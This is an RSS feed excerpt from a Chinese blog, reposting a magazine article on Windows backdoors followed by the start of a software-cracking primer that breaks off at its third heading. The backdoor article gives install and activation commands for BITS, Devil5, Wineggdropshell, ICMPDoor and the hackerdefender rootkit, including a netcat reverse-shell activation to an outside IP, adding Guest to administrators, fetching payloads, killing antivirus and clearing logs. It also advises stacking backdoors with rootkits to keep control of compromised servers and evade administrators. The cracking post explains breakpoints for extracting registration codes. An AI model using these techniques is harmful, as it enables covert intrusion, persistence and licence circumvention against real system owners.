target=_blank>脚本</a>方面的后门还有CGI和PHP两面三刀大类，使用原理都差不多，这里就不再多介绍，在黑防<a href="http://www.nohack.cn/bbs/" target=_blank>论坛</a>也收录了这三种后门，大家可以下载后自己研究。<br><br>2.线程插入后门<br>首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有<a href="http://www.nohack.cn/" target=_blank>网络</a>操作均播入到其他应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的进程中完成。也就是说，即使受控制端安装的防火墙拥有&#8220;应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>访问权限&#8221;的功能，也不能对这样的后门进行有效的警告和拦截，也就使对方的防火墙形同虚设了！这种后门是现在非常主流的一种，很让防护的人头疼，因为对它的查杀比较困难，这种后门本身的功能比较强大，是&#8220;居中家旅行、入侵<a href="http://www.nohack.cn/" target=_blank>攻击</a>&#8221;的必备品哦！<br>这类的典范就是国内提倡<a href="http://www.nohack.cn/" target=_blank>网络</a>共享的小榕的BITS了，从它的推出以来，各类<a href="http://www.nohack.cn/" target=_blank>安全</a>工具下载园地里BITS就高居榜首，非常多的朋友使用它的过程中感到了方便。<br><br>BITS<br>类型：系统后门<br>使用范围：wind200/xp/2003<br>隐蔽<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★★☆<br>使用难度：★★★☆☆<br>危害<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★★☆<br>查杀难度：★★★★☆<br><br>BITS 其实是BackgroundIntelligentTransferServicer的缩写，可以在不知不觉中实现另一种意义的典型的线程插入后门，有以下特点：进程管理器中看不到；平时没有端口，只是在系统中充当卧底的角色；提供正向连接和反向连接两种功能；仅适合用于<u><font color=#0000ff>windows</font></u>200/xp/2003。<br>运用举例<br>首先我们用3389登录上肉鸡，确定你有SYSTEM的权限，将BITS.DLL拷贝到服务器上，执行CMD命令：<br>rundll32.exebits.dll,install<br>这样就激活了BIST，<a href="http://www.nohack.cn/code/" target=_blank>程序</a>用这个特征的字符来辨认使用者，也就相当于你的密码了，然后卸载：rundll32.exeBITS.dll,Uninstall<br>这是最简单的使用，这个后门除了隐蔽性好外，还有两大特点是非常值得借鉴的：端口复用和正反向连接。虽然很多朋友经常听到这两个名词，但并不了解它们，端口复用就是利用系统正常的TCP端口通讯和控制，比如80、139等，这样的后门有个非常大的好处就是非常隐蔽，不用自己开端口也不会暴露自己的访问，因为通讯本身就是系统的正常访问！另一个是反向连接，这个很常见，也是后门中一个经典思路，因为从服务器上主动方问外边是不被禁止的，很多很历害的防火墙就怕这点！<br>BITS的正向连接很简单，大家可以参考它的README，这种方式在服务器没有防火墙等措施的时候很管用，可以方便地连接，但是遇到有防火墙这样的方式就不灵了，得使用下面的反向连接方式：<br>在本地使用NC监听（如：nc-l-p1234）<br>用NC连接目标主机的任何一个防火墙允许的TCP端口（80/139/445&#8230;&#8230;）<br>输入激活命令：hkfx@dancewithdolphin[rxell]:1.1.1.1:2222<br>目标主机的CMD将会出现NC监听的端口2222，这样就实现了绕过防火墙的功能了。<br>devil5(魔鬼5号）<br>类型：系统后门<br>使用范围：win200/xp/2003<br>隐蔽程度：★★★★☆<br>使用难度：★★☆☆☆<br>危害<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：★★★★☆<br>查杀难度：★★★☆☆<br>同BITS一样，Devil5也是线程插入式的后门，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程，适合对系统有一定了解的使用都使用，由于是自定义插入线程，所以它更难被查杀，下面我们来看看它的使用。<br>运用举例：<br>道德使用它自带的配置<a href="http://www.nohack.cn/code/" target=_blank>程序</a>EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制，一般设置成系统自带的SVCHOST，然后运行后门就可以控制了。<br>我们用TELNET连接上去，连接的格式是：TELNET***定制的端口，它和其他后门不同之处在于连接后没有提示的界面，每次执行<a href="http://www.nohack.cn/code/" target=_blank>程序</a>也是分开的，必须要每次都有输入密码，比如我们丢掉了服务器和管账户，可以激活GUEST后再将GUEST加到管理员权限，记得每次执行命令后加上 &#8220;&gt;密码&#8221;就可以了：netlocalgroupadministratorsguest/add&gt;hkfx，然后你又可以控制服务器了。<br>很明显示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通过系统自带端口通讯、执行命令比较麻烦，需要每次输入密码而且不回显示输入内容，很容易出错。但是，它有自己的优势：插入线程可以自已定制，比如设置IE的线程为插入的目标就比较难被查杀：自己提供了专门的查杀工具 DELDEVIL5.exe，帮助防护者清理系统；而且它可以任意改名和绑定，使用灵活性上比BITS强&#8230;&#8230;大家选择哪能款就看自己的喜好了。<br>另外，PortLessBackDoor等工具也是此类的后门，功能强大，隐蔽性稍差，大家有兴趣可以自己研究一下。<br>3.扩展后门<br>所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制肉鸡或者服务器，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。<br>Wineggdroupshell<br>类型：系统后门<br>使用范围：win2000/xp/2003<br>隐蔽程度：★★★★☆<br>使用难度：★★☆☆☆<br>危害程度：★★★★☆<br>查杀难度：★★★★☆<br>这个后门是扩展后门中很有代表性的一个，功能这全面让人叹为观止，它能实现如下比较有特色的功能：进程管理，可查看，杀进程（支持用进程名或PID来杀进程）；注册表管现（查看，删除，增加等功能）；服务管理（停止，启动，枚举，配置，删除服务等功能）端口到<a href="http://www.nohack.cn/code/" target=_blank>程序</a>关联功能（fport）；系统重启，关电源，注销等功能（reboot,poweroff,shutdown,logoff）；嗅探密码功能；安装终端，修改终端端口功能；端口重定向功能（多线程，并且可限制连接者IP）；HTTP服务功能（多线程，并且可限制连接者IP）；Socd5代理功能（支持两种不同方式验证，可限制连接者IP）；克隆账号，检测克隆账户功能（clone,checkclone）；加强了的Findpassword功能（可以得到所有登录用户，包括使用克隆账户远程登录用户密码）；HTTP代理（完全匿名，支持oicq、msn、mirc等<a href="http://www.nohack.cn/code/" target=_blank>程序</a>）；其他辅助功能，http下载，删除日志，系统信息，恢复常用关联，枚举系统账户等。<br>当<a href="http://www.nohack.cn/" target=_blank>网络</a>上刚推出这个后门的时候，非常多的人用它来替换自己原来使用的后门，一时间各处赞扬之声迭起，但多为一些普通的打捞手的心声，其实它和&#8220;后门&#8221;的原始定义是有出入的：一旦你需要实现越多的功能，那你的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>在执行、隐藏、稳定等方面就需要考虑非常多的问题，一个疏忽就会导致全盘皆败，所以不建议将此后门用在需要非常隐蔽的地方。<br>运用举例<br>在安装后门前，需要使用它自带的EditServer.exe<a href="http://www.nohack.cn/code/" target=_blank>程序</a>对服务端进行非常详细的配置，从10个具体配置中，包括了插入线程、密码、IP登录邮件通告等方面，不难看出它的功能是非常强大的，隐蔽性也很强，下面说几个在入侵中常用的功能，相信经常玩入侵的朋友一定能发现它的强大之处：<br>Fport:列出进程到端口的列表，用于发现系统中运行<a href="http://www.nohack.cn/code/" target=_blank>程序</a>所对应的端口，可以用来检测常见的隐蔽的后门。<br>Reboot:重启系统，如果你上传并运行了其他后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，并需要重启机器以便让后门正常工作，那使用这个命令吧！<br>Shell:得到一个DosShell,这个不多讲了，直接得到服务器或者肉鸡上的cmdshell。<br>PskillPID或<a href="http://www.nohack.cn/code/" target=_blank>程序</a>名：用于杀掉特定的服务，比如杀毒软件或者是防火墙。<br>Execute<a href="http://www.nohack.cn/code/" target=_blank>程序</a>：在后台中执行<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，比如sniffer等。http://ip/文件名保存文件名：下载<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，直接从网上down一个后门到服务器上。<br>Installterm端口：在没有安装终端服务的win2k服务版的系统中安装终端服务，重启系统后才生效，并可以自定义连接端口，比如不用3389而用其他端口。<br>StopService/StartService:停止或者启动某个系统服务，比如telnet。<br>CleanEvent:删除系统日志。<br>Redirect:TCP数据转发，这个功能是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中非常出色的一个功能，可以通过某一端口的数据转发来控制内网的机器，在渗透入侵的时候非常管用！<br>EnumService:列举所有自动启动的服务的资料，比如后门、<a href="http://www.nohack.cn/" target=_blank>木马</a>。<br>RegEdit:进入注册表操作模式，熟悉注册表的使用者终于在后门中找到了福音！<br>Findpassword:得到所有登录用户密码，比我们常用的findpass功能可强多了。<br>&#8230;&#8230;<br>总体来讲，Wineggdropshell是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中很出彩的一个，它经过作者几次大规模的修改和升级，已经趋于稳定，功能的强大当然没得说，但是由于功能太强大，被查杀和怀疑是难以避免的，所以很多人在使用Wineggdropshell一段时间后就发现肉鸡飞了，其实是很正常的事，我你出不用气馁，其实用很简单的方法就可以很好地提高它的隐蔽性，下文将有说明。<br>相对于Wineggdropshell来说，独孤剑客的winshell在功能上就不那么全面了，但是笔者推荐新手更多的使用 winshell而不是Wineggdropshell，因为winshell功能除了获得一个shell以外，只加入了一些重启、关闭服务器的命令，功能相对简单，但完全使用系统自带的cmd来执行命令，对系统学习和掌握也是非常有帮助的！<br>Winshell和wolf这两者都是国内早期顶尖的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的编制无疑是非常经典的，新手学习时使用这两款后门一定能让你明白很多系统相关东西，了解很多入侵思路和方法。<br><br>C/S后门<br>传统的<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>常常使用C/S构架，这样的构架很方便控制，也在一定程度上避免了&#8220;万能密码&#8221;的情况出现，对后门私有化有一定的贡献，这方面分类比较模糊，很多后门可以归结到此类中，比如较巧妙的就是ICMPDoor了<br>ICMPDoor<br>类型：系统后门<br>使用范围：win2000/xp/2003<br>隐蔽程度：★★★★★<br>使用难度：★★★☆☆<br>危害程度：★★★★☆<br>查杀难度：★★★★★<br>这个后门利用ICMP通道进行通信，所以不开任何端口，只是利用系统本身的ICMP包进行控制安装成系统服务后，开机自动运行，可以穿透很多防火墙——很明显可以看出它的最大特点：不开任何端口~只通过ICMP控制！和上面任何一款后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>相比，它的控制方式是很特殊的，连80端口都不用开放，不得不佩服务<a href="http://www.nohack.cn/code/" target=_blank>程序</a>编制都在这方面独特的思维角度和眼光！<br>运用举例<br>这个后门其实用途最广的地方在于突破网关后对内网计算机的控制，因为很多机密数据都是放在内网计算机上的，而控制内网计算机并不是我们想到位的商业<a href="http://www.nohack.cn/" target=_blank>网络</a>进行入侵检测，它的<a href="http://www.nohack.cn/" target=_blank>网络</a>内部并不像我们常见的内网那样非常容易入侵和控制，因为该公司本身涉及到一些<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>的服务，所以内网个人计算机的防护是很到位的，在尝试过很多后门后，最后ICMPDoor帮我实现了成功的渗透内网！由此笔者开始爱上这个后门。<br>首先使用icmpsrv.exe-install参数进行后门的安装，再使用icmpsend.exeIP进行控制，可以用：[http: //xxx.xxx.xxx/admin.exep;-hkfx.exe]方式下载文件，保存在//system32/目录下，文件名为 hkfx.exe，<a href="http://www.nohack.cn/code/" target=_blank>程序</a>名前的&#8220;-&#8221;不能省去，使用[pslist]还可以列出远程主机的进程名称和pid，再使用[pskillid]就可以杀进程了，同样，输入普通cmd命令，则远程主机也就执行了相关的命令。<br>这个后门是采用的c/s构架，必须要使用icmpsend才能激活服务器，但是他也有自己的先天不足：后门依靠ICMP进行通讯，现在的<a href="http://www.nohack.cn/" target=_blank>网络</a>，经过冲击波的洗礼后，很少有服务器还接受ICMP包了，很多都屏蔽掉了它，所以用它来控制服务器不是一个好办法，这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧？！<br>5.rootkit<br>如果说上面的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都各有千秋、各有所长的话，它们和经典的rootkit一比简直就是小巫见大巫了，那究竟什么样是rootkit呢？<br>rootkit出现于20世纪90年代初，在1994年2月的一篇<a href="http://www.nohack.cn/" target=_blank>安全</a>咨询报告中首先使用了rootkit这个名词。从出现至今，rootkit的<a href="http://www.nohack.cn/" target=_blank>技术</a>发展非常迅速，应用越来越广泛，检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的rootkit最多。<br>很多人有一个误解，他们认为rootkit是用作获得系统root访问权限的工具。实际上，rootkit是<a href="http://www.nohack.cn/" target=_blank>攻击</a>都用来隐蔽自己的踪迹和保留root访问权限的工具。通常，<a href="http://www.nohack.cn/" target=_blank>攻击</a>者通过远程<a href="http://www.nohack.cn/" target=_blank>攻击</a>获得root访问权限，进入系统后，<a href="http://www.nohack.cn/" target=_blank>攻击</a>者会在侵入的主机中安装rootkit，然后他将经常通过rootkit的后门检查系统是否有其他的用户登录，如果只有自己，<a href="http://www.nohack.cn/" target=_blank>攻击</a>者就开始着手清理日志中的有关信息。通过rootkit的嗅探器获得其他系统的用户和密码之后，<a href="http://www.nohack.cn/" target=_blank>攻击</a>者就会利用这些信息侵入其他系统。<br>从*nix系统上迁移到<u><font color=#0000ff>windows</font></u>系统下的rootkit完全沿袭了这些&#8220;可怕&#8221;的功能！现在<a href="http://www.nohack.cn/" target=_blank>网络</a>上常见的rootkit是内核级后门软件，用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。<a href="http://www.nohack.cn/code/" target=_blank>程序</a>同时也在内存中伪装它所做的改动，并且隐身地控制被隐藏进程。<a href="http://www.nohack.cn/code/" target=_blank>程序</a>安装隐藏后门，注册隐藏系统服务并且安装系统驱动。该后门<a href="http://www.nohack.cn/" target=_blank>技术</a>允许植入redirector，是非常难以查杀的一个东东，让很多<a href="http://www.nohack.cn/" target=_blank>网络</a>管员非常头疼！<br>hackerdefender<br>类型：系统后门<br>使用范围：win200/xp/2003<br>隐蔽程度：★★★★★<br>使用难度：★★★★★<br>危害程度：★★★★★<br>查杀难度：★★★★★（呵呵，全部五星，因为它太&#8220;霸道&#8221;了）<br>现在最新版本的hxdf是1.0.0，它是从国外传过来的一个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，包含两个关键<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，里面的配置文件ini非常复杂，相信新手使用也是很困难的主要包括：[HiddenTable]，[RootProcesses]， [HiddenServices]，[HiddenRegKeys]，[HiddenRegvalues]，[StartupRun]， [FreeSpace],[HiddenpORTS]，[Settings]。对功能就是隐藏文件（目录）、隐藏进程、隐蔽服务、隐藏注册键、隐藏注册表键值、启动<a href="http://www.nohack.cn/code/" target=_blank>程序</a>、增加磁盘剩余空间、隐藏端口、后门设置，具体配置我们就不具体讲解了，本期文章有详细的介绍，我们说说它的特点（纯粹个人观点和经验偏激的地方请大家海涵）：<br>（1）可以实现正常系统TCP端口的通讯，比如80等，这个功能在高级后门并不鲜见。<br>（2）能得到简单的系统SHELL，对入侵的老手来说这就够了，多余的功能反而是累赘。<br>（3）隐藏端口，如果你非要使用TCP的某一个非常规端口通讯，那使用这个功能吧，放心，别人发现不了。<br>（4）隐藏后门的所有可找到东西！这个只能用一个字来形容：牛！比如隐藏文件、服务、注册表键等功能，虽然我们说起来是一句话，想念识货的朋友应该能发现这中间NB的地方！<br>（5）史上最经典后门思维：配合其他扩展型后门使用，效果好得出乎你的意料！（这是后面的内容，我们马上讲到）。<br>抛开其他不讲，系统中安装了这样的rootkit，你通过普通的查杀途径根本检测不到这个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>这点就非常值得我们利用了！试想：一个在你服务器上运行的后门，你连看都看不到它，别说查杀了！<br>注：由于此后门危害太大，所以编辑特别在此掐掉作者一段篇幅，喜欢研究后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的朋友可以自己去研究，不过千万注意不要误运行了<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，查杀和清除是非常麻烦的事！直接重新安装系统吧！<br>经典后门思维<br>现在很多朋友都在尝试着开发一些自己的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，他们企图将非常多的功能加入到后门里恨不得一个后门就是一个操作系统！————很明显，这样是不对的！因为一个好的后门能实现非常单一的功能就够了，它不是给你控制服务器的，而是给你在丢掉服务器控制方法的时候用来再次控制服务器的！所以，不要经常使用后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，当然也不要让你的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>太在。<br>所有<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>工具都存在一个问题：隐藏！现在随着广大网友<a href="http://www.nohack.cn/" target=_blank>安全</a>意识的提高，杀毒软件、系统<a href="http://www.nohack.cn/" target=_blank>安全</a>保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>这些东西再不是&#8220;珍品&#8221;了，所以，就算你的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>能实现两万个功能，但是很容易就被杀毒软件查杀的话，那也是白搭！换句话说：如果别人能很方便地看看进程、查查注册表、看看端口就能查出系统有问题的话，你这个后门也就算不上好了！所以记住：隐藏才是最重要的！<br>很多朋友都喜欢使用某个功能很强大的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>来控制服务器，虽然很隐蔽，但一旦被杀，那他就只有望着服务哭了，其实只要我们稍微入宽思路就能解决这样问题：嵌套使用互补的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>！这样一旦一个后门暴露，另一个后门或者几个后门依然在服务器——这点说起来很简单，里面涉及到很多入侵中的经验和方法，也涉入到rootkit，后文我们会讲到。<br>对现在的<a href="http://www.nohack.cn/" target=_blank>网络</a>来说，如果一个<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>工具被公布，那么，在很短的时间内这个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>将被<a href="http://www.nohack.cn/" target=_blank>安全</a>爱好者传到<a href="http://www.nohack.cn/" target=_blank>网络</a>的任何一个地主！很明显，这样<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的存活期很短，不出几天就被查杀了，所以本文列举的所有<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都可以在<a href="http://www.nohack.cn/" target=_blank>网络</a>上找到（光盘上也有收录），只是给大家提供一种比较好的思路和介绍，很多的后门是私人使用的。希望大家通过自己的学习也能写出自己的优秀后门！<br>通过上面的讲解，相信大家对现在主流的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都有了一事实上程度的了解，由于篇幅关系，本文不可以一个接一个实际的去讲解用法和查杀，相信那样读者也读着无聊，编辑审稿后也不能刊登了，具体的使用方法还得靠各位去摸索，下面我们说说经典后门的几个个人体会。<br>首先拍拍wtf的马屁：这小子上次在黑防攻防实验室上说的那句话：&#8220;兄弟们千万不要拘泥于思维的定式，要知道<a href="http://www.nohack.cn/" target=_blank>安全</a>最重要的就是思维的锻炼和意识的培养，为了锻炼大家的思维能力，友情提醒一下大家，我们在关卡中有很多的陷阱哦！千万不要被表面的现象迷惑了！&#8221;不要小看了这句话，把这句话放到<a href="http://www.nohack.cn/" target=_blank>网络</a>入分和<a href="http://www.nohack.cn/" target=_blank>攻击</a>中，很多思维被发散出来，那是整体层次的提高！就拿我们的后门这方面来讲，同样是上面几个功能强大的、隐蔽性好的后门，为什么你装在肉鸡上，不出三天就被查杀了？而别人装一就一直用得好好的呢？这其中其实就是思维转换的重要性的体现，下面我们将具体说说后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>如何才能做的好的思维转换和特点利用，先来看看普通网友的误区：<br>（1）普通<a href="http://www.nohack.cn/" target=_blank>安全</a>爱好者都能通过常见的系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>或者其他途径入侵服务器，然后上去就是新建一个账户，直接添加到管理员权限，有点意识的还能在账户后面加一个$让别人在CMD无法发现，然后再通过什么3389、23控制服务器，汗！这就是你看《<a href="http://www.nohack.cn/" target=_blank>黑客</a>防线》的成绩？《<a href="http://www.nohack.cn/" target=_blank>黑客</a>防线》就这样教你？难道所有管理员都是白痴？都不知道检查系统最重要的账户？这样的肉鸡1天之内不丢都是个奇迹！<br>（2）控制服务器-&gt;上传后门_&gt;开放特定端口-&gt;利用后门控制服务器，这中间通过findpass之类的经典工具得到管理员的密码，给服务器开放3389等服务&#8230;&#8230;同样送给这样的朋友一个字：晕！一个简单得不能再简单的netstat-an就能让你的连接暴露无疑！那时候等着上法庭吧！<br>（3）克隆系统内置账户并使用它来登录服务器，这同样是一个不可取的方法，根据我的经验，这样的肉鸡肯定用不长！一两面三刀周就飞掉了！<br>&#8230;&#8230;&#8230;&#8230;<br>上面只是一些比较低端的错误，相信大家在看了此文后不会现再犯这样的错误，下面我们说说觉的比较<a href="http://www.nohack.cn/" target=_blank>安全</a>的入侵后控制肉鸡的办法，如果我今天讲的东西能有两、三句能让你在以后的入侵和<a href="http://www.nohack.cn/" target=_blank>安全</a>防护中记住，那我倍感欣慰了！<br>普通的入侵过程中，3389当然是大家最喜欢的控制方式，那为什么就只用3389来单纯控制服务吕呢？当别人关掉3389后你怎么控制呢？所以需要后门，那安装上普通的经典后门，为什么我的肉鸡还是在很短的时间内飞掉呢？——请注意：任何一个系统管理员都不是白痴！不管你多&#8220;黑&#8221;，你远程控制服务器总没有别人物理接触来得方便吧！逼不得已人家拔掉网线、格式化硬盘总能让你不能控制了吧？！所以，后门的隐蔽性是非常重要的，要让管理员无法发现系统中有后门就是非常重要的了！<br>一个好的后门，能实现单一的功能就行了，一定不要经常使用你的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>来控制肉鸡，这样你想肉鸡不飞都困难，比较好的方法是：<br>3389/23+扩展型后门+rootkit<br>这是到目前为止最经典的一种后门搭配方式，它几方面的优点显示而易见：对方发现不明ip连接的时候肯定会检查系统问题，改system密码，清理账户是不可避免了，进而管理员对系统的<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>进行一次常规升级和检测，补上最开始被入我们入侵的<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>，这样如果没有后门，再进来就很难了。<br>通常这样情况下管理员会考虑系统中是不是存在后门，使用常见的杀毒软件，<a href="http://www.nohack.cn/" target=_blank>安全</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>来检测系统，发现后门立即查杀，所以在这里后门的隐蔽性非常重要，一时被杀，gameover！所以这里定要选择一些比较难查杀或者是加过壳的后门，上面介绍的后门就是不错的选择，线程插入式是比较难被杀掉的。<br>在这样基础上，如果他发现系统中某个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>总是在对<a href="http://www.nohack.cn/" target=_blank>网络</a>连接，或者是某个端口总是有人连接在上面，管理员肯定会想办法kill掉这个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，所以普通后门再隐藏得好也是会被查杀的，这也是大多数朋友的疑惑了，在这里就需要使用rootkit了！<br>如果从系统级隐藏掉服务名、进、端口、注册表值、启动项目、<a href="http://www.nohack.cn/code/" target=_blank>程序</a>名，那现在想信普通的杀毒<a href="http://www.nohack.cn/code/" target=_blank>程序</a>、<a href="http://www.nohack.cn/" target=_blank>安全</a>工具要查出系统中的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>是很难的！而这点，才是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的精华所在：隐藏！这样的功能，绝对不是某个后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>单一使用能实现！而rootkit和上面介绍的一系列后门中的精品就是你最好的选择！多尝试，想念你一定找到这个经典搭配中的优势的！退一万步讲，如果这样控制的肉鸡飞掉了，奉劝大家还是少玩为妙，免得惹火上身哦！</font></font> 
<img src ="http://www.cnitblog.com/yiye/aggbug/27319.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:07 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27319.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>学软件破解需要知道的6个最基本概念</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27317.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:06:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27317.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27317.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27317.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27317.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27317.html</trackback:ping><description><![CDATA[<p>1. 断点： </p>
<p>所谓断点就是<a href="http://www.nohack.cn/code/" target=_blank>程序</a>被中断的地方，这个词对于解密者来说是再熟悉不过了。那么什么又是中断呢？中断就是由于有特殊事件（中断事件）发生，计算机暂停当前的任务（即<a href="http://www.nohack.cn/code/" target=_blank>程序</a>），转而去执行另外的任务（中断服务<a href="http://www.nohack.cn/code/" target=_blank>程序</a>），然后再返回原先的任务继续执行。打个比方：你正在上班，突然有同学打电话告诉你他从外地坐火车过来，要你去火车站接他。然后你就向老板临时请假，赶往火车站去接同学，接着将他安顿好，随后你又返回公司继续上班，这就是一个中断过程。我们解密的过程就是等到<a href="http://www.nohack.cn/code/" target=_blank>程序</a>去获取我们输入的注册码并准备和正确的注册码相比较的时候将它中断下来，然后我们通过分析<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，找到正确的注册码。所以我们需要为被解密的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>设置断点，在适当的时候切入<a href="http://www.nohack.cn/code/" target=_blank>程序</a>内部，追踪到<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的注册码，从而达到crack的目的。 </p>
<p>2. 领空： </p>
<p>这是个非常重要的概念，但是也初学者是常常不明白的地方。我们在各种各样的破解文章里都能看到领空这个词，如果你搞不清楚到底<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的领空在哪里，那么你就不可能进入破解的大门。或许你也曾破解过某些软件，但那只是瞎猫碰到死老鼠而已（以前我就是这样的^_^,现在说起来都不好意思喔！）。所谓<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的领空，说白了就是<a href="http://www.nohack.cn/code/" target=_blank>程序</a>自己的地方，也就是我们要破解的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>自己<a href="http://www.nohack.cn/code/" target=_blank>程序</a>码所处的位置。也许你马上会问：我是在<a href="http://www.nohack.cn/code/" target=_blank>程序</a>运行的时候设置的断点，为什么中断后不是在<a href="http://www.nohack.cn/code/" target=_blank>程序</a>自己的空间呢？因为每个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的编写都没有固定的模式，所以我们要在想要切入<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的时候中断<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，就必须不依赖具体的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>设置断点，也就是我们设置的断点应该是每个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都会用到的东西。在DOS时代，基本上所有的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都是工作在中断<a href="http://www.nohack.cn/code/" target=_blank>程序</a>之上的，即几乎所有的DOS<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都会去调用各种中断来完成任务。但是到了WINDOWS时代，<a href="http://www.nohack.cn/code/" target=_blank>程序</a>没有权力直接调用中断，WINDOWS系统提供了一个系统功能调用平台（API），就向DOS<a href="http://www.nohack.cn/code/" target=_blank>程序</a>以中断<a href="http://www.nohack.cn/code/" target=_blank>程序</a>为基础一样，WINDOWS<a href="http://www.nohack.cn/code/" target=_blank>程序</a>以API为基础来实现和系统打交道，从而各种功能，所以WINDWOS下的软件破解其断点设置是以API函数为基础的，即当<a href="http://www.nohack.cn/code/" target=_blank>程序</a>调用某个API函数时中断其正常运行，然后进行解密。例如在SOFTICE中设置下面的断点：bpx GetDlgItemText（获取对话框文本），当我们要破解的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>要读取输入的数据而调用GetDlgItemText时，立即被SOFTICE拦截到，从而被破解的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>停留在GetDlgItemText的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>区，而GetDlgItemText是处于WINDWOS自己管理的系统区域，如果我们擅自改掉这部分的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>代码，那就大祸临头了^_^！所以我们要从系统区域返回到被破解<a href="http://www.nohack.cn/code/" target=_blank>程序</a>自己的地方（即<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的领空），才能对<a href="http://www.nohack.cn/code/" target=_blank>程序</a>进行破解，至于怎样看<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的领空请看前面的SOFTICE图解。试想一下：对于每个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都会调用的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>段，我们可能从那里找到什么有用的东西吗？（怎么样去加密是<a href="http://www.nohack.cn/code/" target=_blank>程序</a>自己决定的，而不是调用系统功能实现的！） </p>
<p>3. API： </p>
